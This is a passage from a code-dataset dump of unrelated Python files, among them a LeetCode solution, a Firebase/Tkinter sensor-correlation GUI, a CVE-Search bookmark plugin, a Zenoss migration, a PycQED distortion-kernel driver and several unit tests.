run_cmd(cmd)\n\n\n","sub_path":"scripts/run_eval.py","file_name":"run_eval.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"208499364","text":"#\n# @lc app=leetcode id=19 lang=python3\n#\n# [19] Remove Nth Node From End of List\n#\n# https://leetcode.com/problems/remove-nth-node-from-end-of-list/description/\n#\n# algorithms\n# Medium (35.74%)\n# Likes: 4869\n# Dislikes: 290\n# Total Accepted: 807.4K\n# Total Submissions: 2.3M\n# Testcase Example: '[1,2,3,4,5]\\n2'\n#\n# Given the head of a linked list, remove the n^th node from the end of the\n# list and return its head.\n# \n# Follow up: Could you do this in one pass?\n# \n# \n# Example 1:\n# \n# \n# Input: head = [1,2,3,4,5], n = 2\n# Output: [1,2,3,5]\n# \n# \n# Example 2:\n# \n# \n# Input: head = [1], n = 1\n# Output: []\n# \n# \n# Example 3:\n# \n# \n# Input: head = [1,2], n = 1\n# Output: [1]\n# \n# \n# \n# Constraints:\n# \n# \n# The number of nodes in the list is sz.\n# 1 <= sz <= 30\n# 0 <= Node.val <= 100\n# 1 <= n <= sz\n# \n# \n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n slow = head\n fast = head\n while n > 0:\n fast = fast.next\n n -= 1\n if fast is None:\n return head.next\n while fast is not None and fast.next is not None:\n fast = fast.next\n slow = slow.next\n\n slow.next = slow.next.next\n return head\n# @lc code=end\n\n","sub_path":"19.remove-nth-node-from-end-of-list.py","file_name":"19.remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642175947","text":"import datetime\nimport random\nfrom tkinter.ttk import Combobox\n\nfrom firebase import firebase\nimport matplotlib.pyplot as p\nimport numpy as np\nfrom tkinter import *\n\nvariables = []\nvalues = []\ndictionary = []\ncorr_mat = np.zeros((12, 12), int)\ncorr_p, p_oil, p_ev, p_con, s_con, s_ev, temph_i, temph_s, tempc_i, tempc_s, temp_d, temp_a = [], [], [], [], [], [], \\\n [], [], [], [], [], []\nfirebase = firebase.FirebaseApplication('https://proyecto-b2674.firebaseio.com/')\n\n\ndef pushed():\n date = datetime.datetime.now()\n\n data_dict = {\"Temperatura del Déposito de Aceite\": \"1\",\n \"Presión de Aceite\": \"2\",\n \"Presión en Condesador\": \"3\",\n \"Saturación en Condesador\": \"4\",\n \"Presión del Evaporador\": \"5\",\n \"Saturación en Evaporador\": \"6\"}\n firebase.post('/RPi', data_dict)\n #firebase.put('RPi', \"NombreX\", data_dict)\n\n lbl_1.configure(text=\"you clicked\")\n\n\ndef get_data(corrp, poil, pev, pcon, scon, sev, temphi, temphs, tempci, tempcs, tempd, tempa):\n # Here we clear the array\n variables.clear()\n data_dict = firebase.get(\"/data\", None)\n\n if combo1.get() == \"Ultimas 24 horas\":\n length = 10 # value of the radio button for time lapse\n elif combo1.get() == 'Ultimas 72 horas':\n length = 50\n else:\n length = 100\n\n count = 0 # This counter indicates how much variables we are gonna get\n for i, j in data_dict.items():\n count += 1\n if count > length:\n break\n for x, y in j.items():\n if x == \"% de Corriente a Plena Carga\":\n corrp.append(y)\n elif x == \"Presión de Aceite\":\n poil.append(y)\n elif x == \"Presión del Evaporador\":\n pev.append(y)\n elif x == \"Presión en Condesador\":\n pcon.append(y)\n elif x == \"Saturación en Condesador\":\n scon.append(y)\n elif x == \"Saturación en Evaporador\":\n sev.append(y)\n elif x == \"Temperatura de Agua Helada\":\n for z, w in y.items():\n if z == \"Introduciendo\":\n temphi.append(w)\n else:\n temphs.append(w)\n elif x == \"Temperatura de Agua de Condensación\":\n for z, w in y.items():\n if z == \"Introduciendo\":\n tempci.append(w)\n else:\n tempcs.append(w)\n elif x == \"Temperatura de Descarga\":\n tempd.append(y)\n else:\n tempa.append(y)\n print(\"Contador: \", count)\n corrp = np.array(corrp)\n poil = np.array(poil)\n pev = np.array(pev)\n pcon = np.array(pcon)\n scon = np.array(scon)\n sev = np.array(sev)\n temphi = np.array(temphi)\n temphs = np.array(temphs)\n tempci = np.array(tempci)\n tempcs = np.array(tempcs)\n tempd = np.array(tempd)\n tempa = np.array(tempa)\n\n # Here we return all variables as a dictionary\n variables.extend((corrp, poil, pev, pcon, scon, sev, temphi, temphs, tempci, tempcs, tempd, tempa))\n\n\ndef plot(x, y, x_label, y_label):\n p.figure(x_label + \" vs \" + y_label)\n corr = np.corrcoef(x, y)\n corr = corr[0][1]\n p.title(\"Correlation coefficient: {}\".format(corr))\n p.plot(x, y, \".r\")\n p.xlabel(x_label)\n p.ylabel(y_label)\n p.show()\n\n\n# Lets_plot allows to get the list of data and the respective label for the radio buttons selected\ndef lets_plot(name1, name2):\n\n \"\"\"X\"\"\"\n if name1 == 'Temperatura de Descarga':\n x = variables[10]\n elif name1 == '% de Corriente a Plena Carga':\n x = variables[0]\n elif name1 == 'Temp Introduciendo Agua de condensación':\n x = variables[8]\n elif name1 == 'Temp Salida agua de condensación':\n x = variables[9]\n elif name1 == 'Temperatura del Depósito de Aceite':\n x = variables[11]\n elif name1 == 'Presión de Aceite':\n x = variables[1]\n elif name1 == 'Temp Introduciendo Agua Helada':\n x = variables[6]\n elif name1 == 'Temp Salida Agua Helada':\n x = variables[7]\n elif name1 == 'Presión de condensador':\n x = variables[3]\n elif name1 == 'Saturacion en condensador':\n x = variables[4]\n elif name1 == 'Presion del Evaporador':\n x = variables[2]\n if name1 == 'Saturacion en Evaporador':\n x = variables[5]\n\n \"\"\"Y\"\"\"\n if name2 == 'Temperatura de Descarga':\n y = variables[10]\n elif name2 == '% de Corriente a Plena Carga':\n y = variables[0]\n elif name2 == 'Temp Introduciendo Agua de condensación':\n y = variables[8]\n elif name2 == 'Temp Salida agua de condensación':\n y = variables[9]\n elif name2 == 'Temperatura del Depósito de Aceite':\n y = variables[11]\n elif name2 == 'Presión de Aceite':\n y = variables[1]\n elif name2 == 'Temp Introduciendo Agua Helada':\n y = variables[6]\n elif name2 == 'Temp Salida Agua Helada':\n y = variables[7]\n elif name2 == 'Presión de condensador':\n y = variables[3]\n elif name2 == 'Saturacion en condensador':\n y = variables[4]\n elif name2 == 'Presion del Evaporador':\n y = variables[2]\n if name2 == 'Saturacion en Evaporador':\n y = variables[5]\n\n plot(x, y, name1, name2)\n\ndef update(list):\n combo3['values'] = list\n\n\ndef check_for_correlation():\n amount = 0\n corr_mat.fill(0)\n\n print(\"cantidad variables: \", len(variables))\n for i in range(0, len(variables)): # len(variables) to get all data\n for j in range(i, len(variables)):\n if i != j:\n amount += 1\n corr = np.corrcoef(variables[i], variables[j])\n corr = corr[0][1]\n if abs(corr) >= 0.1:\n print(\"Relevant correlation\")\n corr_mat[i][j] = 1\n\n print(\"Coeficiente de correlación: {}\".format(corr))\n print(amount)\n\n for i in range(12):\n for j in range(i, 12):\n corr_mat[j][i] = corr_mat[i][j]\n\n print(corr_mat)\n\n\n \"\"\"# Insert values into textbox\n txt_1.configure(state='normal')\n txt_1.insert(\"end\", str(corr[0][1]))\n txt_1.configure(state='disabled')\"\"\"\n\ndef on_select():\n\n # this vector saves the values that are correlated to the one selected in the combobox2\n vec = []\n # This vector saves the variables names\n vec2 = []\n\n val = 0\n for i in range(12):\n if dictionary[i] == combo2.get():\n val = i\n break\n for i in range(0, len(corr_mat)):\n if corr_mat[val][i] == 1:\n vec.append(i)\n for i in range(0, len(vec)):\n vec2.append(dictionary[vec[i]])\n combo3.configure(state='readonly')\n combo3.configure(postcommand=update(vec2))\n\n\nif __name__ == \"__main__\":\n\n '''Main Window'''\n window = Tk()\n # Window title\n window.title(\"DSRED (Display System for Raspberry pi Extracted Data)\")\n # Window size\n window.geometry('600x200')\n\n \"\"\"-------------------------------------------------------GUI----------------------------------------------------\"\"\"\n '''Labels'''\n lbl_1 = Label(window, text=\"Push Data\")\n lbl_2 = Label(window, text=\"Get Data\")\n lbl_3 = Label(window, text=\"Graph variables\")\n lbl_4 = Label(window, text=\"Check for correlation\")\n lbl_5 = Label(window, text=\"Correlation coefficient\")\n lbl_6 = Label(window, text=\"X axis\")\n lbl_7 = Label(window, text=\"Y axis\")\n\n '''Buttons actions'''\n # Push data\n btn_1 = Button(window, text=\"Push data\", bg=\"gray\", fg=\"black\", command=pushed)\n # Get data\n btn_2 = Button(window, text=\"Get data\", bg=\"gray\", fg=\"black\", command=lambda: get_data(corr_p, p_oil, p_ev, p_con,\n s_con, s_ev, temph_i,\n temph_s, tempc_i, tempc_s,\n temp_d, temp_a))\n # Graph variables\n btn_3 = Button(window, text=\"Graph\", bg=\"gray\", fg=\"black\", command=lambda: lets_plot(combo2.get(), combo3.get()))\n # Check correlation\n btn_4 = Button(window, text=\"Check\", bg=\"gray\", fg=\"black\", command=lambda: check_for_correlation())\n\n '''Combo boxes'''\n # Radio buttons values must be different from each other\n selected2 = StringVar() # Selected for x axis\n selected3 = StringVar() # Selected for y axis\n combo1 = Combobox(window, width=33, state='readonly')\n combo2 = Combobox(window, width=33, state='readonly')\n combo3 = Combobox(window, width=33, state='disabled')\n\n combo1['values'] = ('Ultimas 24 horas', 'Ultimas 72 horas', 'Ultima semana')\n combo2['values'] = ('% de Corriente a Plena Carga', 'Presión de Aceite', 'Presion del Evaporador',\n 'Presión de condensador', 'Saturacion en condensador', 'Saturacion en Evaporador',\n 'Temp Introduciendo Agua Helada', 'Temp Salida Agua Helada',\n 'Temp Introduciendo Agua de condensación', 'Temp Salida agua de condensación',\n 'Temperatura de Descarga','Temperatura del Depósito de Aceite')\n\n combo3['values'] = ('% de Corriente a Plena Carga', 'Presión de Aceite', 'Presion del Evaporador',\n 'Presión de condensador', 'Saturacion en condensador', 'Saturacion en Evaporador',\n 'Temp Introduciendo Agua Helada', 'Temp Salida Agua Helada',\n 'Temp Introduciendo Agua de condensación', 'Temp Salida agua de condensación',\n 'Temperatura de Descarga','Temperatura del Depósito de Aceite')\n #combo3.set(\"\")\n #combo3.trace('values', on_select)\n combo2.bind(\"<>\", lambda _ : on_select())\n\n #corrp, poil, pev, pcon, scon, sev, temphi, temphs, tempci, tempcs, tempd, tempa\n dictionary.extend(('% de Corriente a Plena Carga', 'Presión de Aceite', 'Presion del Evaporador',\n 'Presión de condensador', 'Saturacion en condensador', 'Saturacion en Evaporador',\n 'Temp Introduciendo Agua Helada', 'Temp Salida Agua Helada',\n 'Temp Introduciendo Agua de condensación', 'Temp Salida agua de condensación',\n 'Temperatura de Descarga','Temperatura del Depósito de Aceite'))\n '''Textboxes'''\n # Correlation Coefficient\n txt_1 = Text(window, state='disabled', width=20, height=1)\n\n \"\"\"-------------------------------------------------GRID--------------------------------------------------------\"\"\"\n '''Labels Grid'''\n # Push data\n # lbl_1.grid(column=0, row=0)\n # Get data\n lbl_2.grid(column=0, row=1)\n # Check correlation\n lbl_4.grid(column=2, row=1)\n # X axis\n lbl_6.grid(column=0, row=8)\n # Y axis\n lbl_7.grid(column=0, row=10)\n\n\n '''Buttons grid'''\n # Push data\n # btn_1.grid(column=1, row=0)\n # Get data\n btn_2.grid(column=1, row=2)\n # Graph variables\n btn_3.grid(column=1, row=11)\n # Check correlation\n btn_4.grid(column=3, row=1)\n\n '''Radio buttons grid'''\n # Time lapse\n combo1.grid(column=1, row=1)\n combo2.grid(column=1, row=8)\n combo3.grid(column=1, row=10)\n\n '''Textboxes grid'''\n\n # Window loop, must be at the end\n window.mainloop()\n","sub_path":"fireb.py","file_name":"fireb.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"58868400","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\nfrom codecs import open\nfrom os import path\n\nbasedir = path.abspath(path.dirname(__file__))\n\nwith open(path.join(basedir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(name='hana',\n version='0.0.1',\n\n description='Static site generator',\n long_description=long_description,\n\n author='Mayo Jordanov',\n author_email='mayo@oyam.ca',\n\n url='https://github.com/mayo/hana',\n\n license='MIT',\n\n classifiers=[\n 'Development Status :: 3 - Alpha',\n\n 'License :: Other/Proprietary License',\n\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n ],\n\n keywords='hana static site generator processing file',\n\n packages=['hana'],\n\n# entry_points={\n# 'console_scripts': [\n# 'hana = hana.core:main',\n# ]\n# }\n)\n\n","sub_path":"pypi_install_script/hana-0.0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223371016","text":"import sqlite3\nconn = sqlite3.connect(\"quotes.db\")\n\n# To open sql file \ncurr = conn.cursor()\n\ncurr.execute(\"\"\"create table quotes_db(\n title text,\n author text,\n tag text)\"\"\")\n\nconn.commit()\nconn.close()","sub_path":"web_crawler/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216295067","text":"#!/usr/bin/env python3.3\n# -*- coding: utf-8 -*-\n#\n# Bookmark plug-in for CVE-Search\n#\n# Software is free software released under the \"Modified BSD license\"\n#\n# Copyright (c) 2016 \tPieter-Jan Moreels - pieterjan.moreels@gmail.com\n\n# Necessary imports\nimport os\nimport sys\nimport __main__\ncallLocation = os.path.dirname(os.path.realpath(__main__.__file__))\nsys.path.append(os.path.join(callLocation, \"..\"))\n\nfrom lib.Plugins import Plugin, WebPlugin\nimport lib.CVEs as cves\nimport lib.DatabaseLayer as db\n\nclass bookmark(WebPlugin):\n def __init__(self):\n super().__init__()\n self.name = \"Bookmarks\"\n self.requiresAuth = True\n self.collectionName = \"user_bookmarks\"\n\n def getPage(self, **args):\n cvesp = cves.CveHandler(rankinglookup=True, namelookup=True, via4lookup=True, capeclookup=True,subscorelookup=True)\n data = db.p_queryOne(self.collectionName, {\"user\": args[\"current_user\"].get_id()})\n bookmarks = data.get(\"bookmarks\", []) if data else []\n cve=[cvesp.getcve(cveid=x) for x in bookmarks]\n page=\"bookmarks.html\"\n return (page, {\"cve\": cve})\n\n def getCVEActions(self, cve, **args):\n userdata = db.p_queryOne(self.collectionName, {'user': args[\"current_user\"].get_id()})\n if userdata and 'bookmarks' in userdata and cve in userdata['bookmarks']:\n return [{'text': 'Remove bookmark', 'action': 'unbookmark', 'icon': 'star'}]\n else:\n return [{'text': 'Bookmark', 'action': 'bookmark', 'icon': 'star-empty'}]\n\n def onCVEAction(self, cve, action, **args):\n try:\n query = {'user': args[\"current_user\"].get_id()}\n if action == \"bookmark\":\n db.p_addToList(self.collectionName, query, \"bookmarks\", cve)\n elif action == \"unbookmark\":\n db.p_removeFromList(self.collectionName, query, \"bookmarks\", cve)\n return True\n except Exception as e:\n return False\n","sub_path":"plugins/plugins/bookmarks/plugins/bookmark.py","file_name":"bookmark.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130322448","text":"import unittest\nimport sys\nsys.path.append(\"../scripts\")\nfrom flatfeature import Bed\nfrom merge2 import parse_missed_genes,group_genes_in_bed,update_locs,merge_hits,no_intervening_genes\n\nclass TestMask(unittest.TestCase):\n def setUp(self):\n self.old_bed = Bed(\"data/rice_t_sorghum_v1/sorghum_v1.bed\")\n self.missed_bed = Bed(\"data/rice_t_sorghum_v1/missed_sorghum_v1_from_rice_b.bed\")\n self.matches = \"data/rice_t_sorghum_v1/missed_sorghum_v1_from_rice_b.matches.txt\"\n self.missed_genes = parse_missed_genes(self.matches)\n self.missed_genes_grouped, self.missed_genes_dict = group_genes_in_bed(self.missed_genes,self.old_bed,self.missed_bed)\n \n def test_group_genes_in_bed(self):\n missed_genes_grouped, missed_genes_dict = group_genes_in_bed(self.missed_genes,self.old_bed,self.missed_bed)\n ### adding to old bed example\n self.assertEqual(missed_genes_dict['Sb01g039400']['locs'], [(62821196, 62822809), (62822899, 62823011)])\n #### example with more then one hit for os03\n self.assertEqual(missed_genes_grouped[\"Os03g06330\"],[('1', 1035243, 1035376, 'sorghum_v1_1_1035243_1035376'), ('1', 43157679, 43159029, 'sorghum_v1_1_43157679_43159029')])\n def test_update_locs(self):\n pass\n #make sure gets samllest and largerst correct\n def test_merge_hits(self):\n hits = tuple(self.missed_genes_grouped[\"Os03g49400\"])\n hits = list(hits)\n merged_hit = merge_hits(hits,self.old_bed, self.missed_genes_dict)\n self.assertEqual(len(merged_hit),1)\n self.assertEqual(len(merged_hit['sorghum_v1_1_9901089_9901320']['locs']),3)\n self.assertEqual(merged_hit['sorghum_v1_1_9901089_9901320']['start'],9896924)\n self.assertEqual(merged_hit['sorghum_v1_1_9901089_9901320']['end'],9901320)\n ### find a large pair of hits that should be merged\n def test_merge_hits_none(self):\n ## none of the hits should merge\n hits = (self.missed_genes_grouped[\"Os01g58037\"])\n merged_hit = merge_hits(hits,self.old_bed,self.missed_genes_dict)\n self.assertEqual(len(merged_hit),5)\n\n def test_no_intervening_genes(self):\n hit = self.missed_genes_grouped[\"Os01g58037\"][0]\n b_hit = ('1',10267337,10267500, 'example')\n booln = no_intervening_genes(hit,b_hit,self.old_bed)\n self.assertEqual(booln,True)\n ### confrim that if within an intervinging gene does not find it\n\nif __name__ == '__main__':\n unittest.main()\n suite = unittest.TestLoader().loadTestsFromTestCase(TestSequenceFunctions)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"pipeline/coann/merge_test.py","file_name":"merge_test.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258558385","text":"##############################################################################\n#\n# Copyright (C) Zenoss, Inc. 2020, all rights reserved.\n#\n# This content is made available according to terms specified in\n# License.zenoss under the directory where your Zenoss product is installed.\n#\n##############################################################################\nfrom __future__ import print_function\n\n__doc__ = '''\nAdd global.conf built by serviced to mariadb services\nto have actual config instead of default\n'''\n\nimport servicemigration as sm\n\nversion = \"7.0.16\"\n\n\ndef migrate(ctx, *args, **kw):\n updated = False\n global_conf = sm.ConfigFile(\n name=\"/opt/zenoss/etc/global.conf\",\n filename=\"/opt/zenoss/etc/global.conf\",\n owner=\"zenoss:zenoss\",\n permissions=\"660\",\n content=\"# Generated by serviced\\n{{range $k,$v:=contextFilter . \\\"global.conf.\\\"}}{{$k}} {{$v}}\\n{{end}}\"\n )\n\n mariadbs = filter(lambda s: s.name in [\"mariadb-model\", \"mariadb-events\", \"mariadb\"], ctx.services)\n for svc in mariadbs:\n if not [cfg for cfg in svc.originalConfigs if cfg.name == global_conf.name]:\n svc.originalConfigs.append(global_conf)\n updated = True\n print(\"Updated %s service\" % svc.name)\n\n if not [cfg for cfg in svc.configFiles if cfg.name == global_conf.name]:\n svc.configFiles.append(global_conf)\n updated = True\n print(\"Updated %s service\" % svc.name)\n\n return updated\n","sub_path":"migrations/src/zenservicemigration/migrations/add_globalconf_to_mariadb.py","file_name":"add_globalconf_to_mariadb.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532034942","text":"\"\"\"\nThis file contains an instrument for correcting distortions\nusing linear filtering (scipy.signal.lfilter).\n\nIt is based on the kernel_object.DistortionsKernel\n\"\"\"\nimport numpy as np\nfrom qcodes.instrument.base import Instrument\nfrom qcodes.utils import validators as vals\nfrom qcodes.instrument.parameter import ManualParameter\n\nfrom pycqed.measurement import kernel_functions_ZI as kf\n\n\nclass LinDistortionKernel(Instrument):\n\n def __init__(self, name, num_models=10, **kw):\n super().__init__(name, **kw)\n self._num_models = num_models\n\n self.add_parameter('cfg_hardware_friendly',\n initial_value=False,\n parameter_class=ManualParameter,\n vals=vals.Bool())\n self.add_parameter('cfg_sampling_rate',\n parameter_class=ManualParameter,\n initial_value=1e9,\n vals=vals.Numbers())\n\n self.add_parameter('cfg_gain_correction',\n parameter_class=ManualParameter,\n initial_value=1,\n vals=vals.Numbers())\n\n for i in range(self._num_models):\n self.add_parameter('filter_model_{:02}'.format(i),\n parameter_class=ManualParameter,\n initial_value={},\n vals=vals.Dict())\n\n def reset_kernels(self):\n \"\"\"\n Resets all kernels to an empty dict so no distortion is applied.\n \"\"\"\n for filt_id in range(self._num_models):\n self.set('filter_model_{:02}'.format(filt_id), {})\n\n def get_first_empty_filter(self):\n \"\"\"\n Resets all kernels to an empty dict so no distortion is applied.\n \"\"\"\n for filt_id in range(self._num_models):\n if self.get('filter_model_{:02}'.format(filt_id)) == {}:\n return filt_id\n raise ValueError('No empty filter')\n\n def distort_waveform(self, waveform, length_samples: int=None,\n inverse: bool=False):\n \"\"\"\n Distorts a waveform using the models specified in the Kernel Object.\n Args:\n waveform (array) : waveform to be distorted\n lenght_samples (int): number of samples after which to cut of wf\n inverse (bool) : if True apply the inverse of the waveform.\n\n Returns:\n y_sig (array) : waveform with distortion filters applied\n\n N.B. the bounce correction does not have an inverse implemented\n (June 2018) MAR\n \"\"\"\n if length_samples is not None:\n extra_samples = length_samples - len(waveform)\n if extra_samples >= 0:\n y_sig = np.concatenate([waveform, np.zeros(extra_samples)])\n else:\n y_sig = waveform[:extra_samples]\n else:\n y_sig = waveform\n for filt_id in range(self._num_models):\n filt = self.get('filter_model_{:02}'.format(filt_id))\n\n if not filt:\n pass # dict is empty\n else:\n model = filt['model']\n if not self.cfg_hardware_friendly():\n if model == 'high-pass':\n y_sig = kf.bias_tee_correction(\n y_sig, sampling_rate=self.cfg_sampling_rate(),\n inverse=inverse,\n **filt['params'])\n elif model == 'exponential':\n y_sig = kf.exponential_decay_correction(\n y_sig, sampling_rate=self.cfg_sampling_rate(),\n inverse=inverse,\n **filt['params'])\n elif model == 'bounce':\n y_sig = kf.bounce_correction(\n y_sig, sampling_rate=self.cfg_sampling_rate(),\n inverse=inverse,\n **filt['params'])\n else:\n raise KeyError('Model {} not recognized'.format(model))\n else:\n raise NotImplementedError()\n if inverse:\n y_sig /= self.cfg_gain_correction()\n else:\n y_sig *= self.cfg_gain_correction()\n return y_sig\n\n def print_overview(self):\n print(\"*\"*80)\n print(\"Overview of {}\".format(self.name))\n for filt_id in range(self._num_models):\n\n filt = self.get('filter_model_{:02}'.format(filt_id))\n if filt != {}:\n model = filt['model']\n params = filt['params']\n\n print('Model {} {}: \\n {}'.format(filt_id, model, params))\n\n print(\"*\"*80)\n","sub_path":"pycqed/instrument_drivers/meta_instrument/lfilt_kernel_object.py","file_name":"lfilt_kernel_object.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348713321","text":"from back_end_test.test_main import helper\n\n\ndef test_r1(capsys):\n \"\"\"\n Test 1: When account is valid and account has sufficient funds to handle withdrawal\n \"\"\"\n helper(\n capsys=capsys,\n input_master_accounts=[\n '1000327 10000 Spencer Venable'\n ],\n input_merged_transactions=[\n 'WDR 1000327 5000 0000000 ***',\n 'EOS 0000000 000 0000000 ***'\n ],\n expected_valid_accounts=[\n '1000327'\n ], \n expected_master_accounts=[\n '1000327 5000 Spencer Venable'\n ],\n expected_tail_of_terminal_output=[\n ]\n )\n\n\ndef test_r2(capsys):\n \"\"\"\n Test 2: When account is valid and account has insufficient funds to handle withdrawal\n \"\"\"\n helper(\n capsys=capsys,\n input_master_accounts=[\n '1000327 2000 Spencer Venable',\n '1000326 10000 Ben Lammers'\n ],\n input_merged_transactions=[\n 'WDR 1000327 5000 0000000 ***',\n 'EOS 0000000 000 0000000 ***'\n ],\n expected_valid_accounts=[\n '1000326'\n ], \n expected_master_accounts=[\n '1000326 10000 Ben Lammers'\n ],\n expected_tail_of_terminal_output=[\n \"Withdraw Error: Account 1000327 has insufficient funds\",\n \"Transaction: WDR 1000327 5000 0000000 ***\"\n ]\n )\n\n\ndef test_r3(capsys):\n \"\"\"\n Test 3: Account does not exist in withdrawal transaction\n \"\"\"\n helper(\n capsys=capsys,\n input_master_accounts=[\n '1000327 10000 Spencer Venable'\n ],\n input_merged_transactions=[\n 'WDR 1000326 5000 0000000 ***',\n 'EOS 0000000 000 0000000 ***'\n ],\n expected_valid_accounts=[\n '1000327'\n ], expected_master_accounts=[\n '1000327 10000 Spencer Venable'\n ],\n expected_tail_of_terminal_output=[\n \"Withdraw Error: Account 1000326 does not exist\",\n \"Transaction: WDR 1000326 5000 0000000 ***\"\n ]\n )\n","sub_path":"back_end_test/test_withdraw.py","file_name":"test_withdraw.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438681837","text":"from __future__ import print_function\n#\n# This cfg calls MakeAngleLUT which is obsolete and completely unused.\n#\n\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Whatever\")\n\nprocess.load('Configuration.Geometry.GeometryExtended2023D4Reco_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, '90X_upgrade2023_realistic_v9', '')\nprint(\"Using GlobalTag: %s\" % process.GlobalTag.globaltag.value())\n\n# Fake alignment is/should be ideal geometry\n# ==========================================\nprocess.load(\"Alignment.CommonAlignmentProducer.FakeAlignmentSource_cfi\")\nprocess.preferFakeAlign = cms.ESPrefer(\"FakeAlignmentSource\")\n\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(1))\n\nprocess.analyzer1 = cms.EDAnalyzer(\"MakeAngleLUT\",\n # Verbosity level\n verbosity = cms.untracked.int32(1),\n\n # Output file\n outfile = cms.string(\"angle.root\"),\n)\n\nprocess.path1 = cms.Path(process.analyzer1)\n","sub_path":"L1Trigger/L1TMuonEndCap/test/tools/make_anglelut_phasetwogeom.py","file_name":"make_anglelut_phasetwogeom.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186131422","text":"#!/usr/bin/env python\nimport argparse\nimport os\nfrom image_utils import summary\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"image\", type=str, help=\"Path to image to summarize\")\nparser.add_argument(\"destination\", type=str, help=\"Path to destination JSON file\")\nparser.add_argument('-n', '--no_convert', action='store_false', help='skip converting step (add if not providing grayscale images)')\nparser.add_argument('-s', '--silent', action='store_true')\n\nargs = parser.parse_args()\n\nimage = args.image\nsilent = args.silent\ndestination = args.destination\nno_convert = args.no_convert\n\nif (not os.path.exists(image)):\n if (not silent):\n print(\"Image %s does not exist.\" % image)\n exit()\n\nif (not os.path.exists(os.path.dirname(destination))):\n if (not silent):\n print(\"Folder does not exist.\")\n exit()\n\njson_str = summary.summarize(image, convert=no_convert, silent=silent)\n\nfile = open(destination,\"w\") \nfile.write(json_str)\nfile.close() \n","sub_path":"summarize_file.py","file_name":"summarize_file.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136698801","text":"class stats(object):\n\t\"\"\"docstring for stats\"\"\"\n\tdef __init__(self, health, stren, dex, con, intel, cha):\n\t\tsuper(stats, self).__init__()\n\t\t# Base stat values\n\t\tself.healthTotal = health\n\t\tself.healthCurrent = health\n\t\tself.str = stren\n\t\tself.dex = dex\n\t\tself.con = con\n\t\tself.int = intel\n\t\tself.cha = cha\n\n\t\t# Stat values after modification from equipment or other effects\n\t\tself.moddedHealthTotal = health\n\t\tself.moddedStr = stren\n\t\tself.moddedDex = dex\n\t\tself.moddedCon = con\n\t\tself.moddedInt = intel\n\t\tself.moddedCha = cha\n\t\t","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295967930","text":"# Calcular el promedio de temperatura y presion recolectado por una estacion metereologica en una semana, \n# considerando que realiza soloa una medida por dia.\n\ntemp_lunes = 30\ntemp_martes = 29.5\ntemp_miercoles = 28.5\ntemp_jueves = 25.9\ntemp_viernes = 24.5\ntemp_sabado = 23.5\ntemp_domingo = 23\n\npres_lunes = 1000\npres_martes = 1050\npres_miercoles = 1100\npres_jueves = 1150\npres_viernes = 1120\npres_sabado = 1100\npres_domingo = 1080\n\n\ncalculo_promedio_temp = (temp_domingo + temp_sabado + temp_viernes + temp_jueves + temp_miercoles + temp_martes + temp_lunes)/7\n\ncalculo_promedio_pres = (pres_domingo + pres_sabado + pres_viernes + pres_jueves + pres_miercoles + pres_martes + pres_lunes)/7\n\nprint('Promedio de temperaturas: ',calculo_promedio_temp)\nprint('Promedio de presiones: ',calculo_promedio_pres)\n","sub_path":"practica n1/ejercicio 16.py","file_name":"ejercicio 16.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"280687598","text":"import requests\r\nimport json\r\nimport cryptography\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql import functions as F\r\nfrom cryptography.fernet import Fernet\r\nfrom pyspark.sql.window import Window\r\nfrom pyspark.sql.functions import row_number,lit,col,explode\r\nfrom pyspark.sql.types import StructField, StructType, StringType, MapType,IntegerType\r\ndef 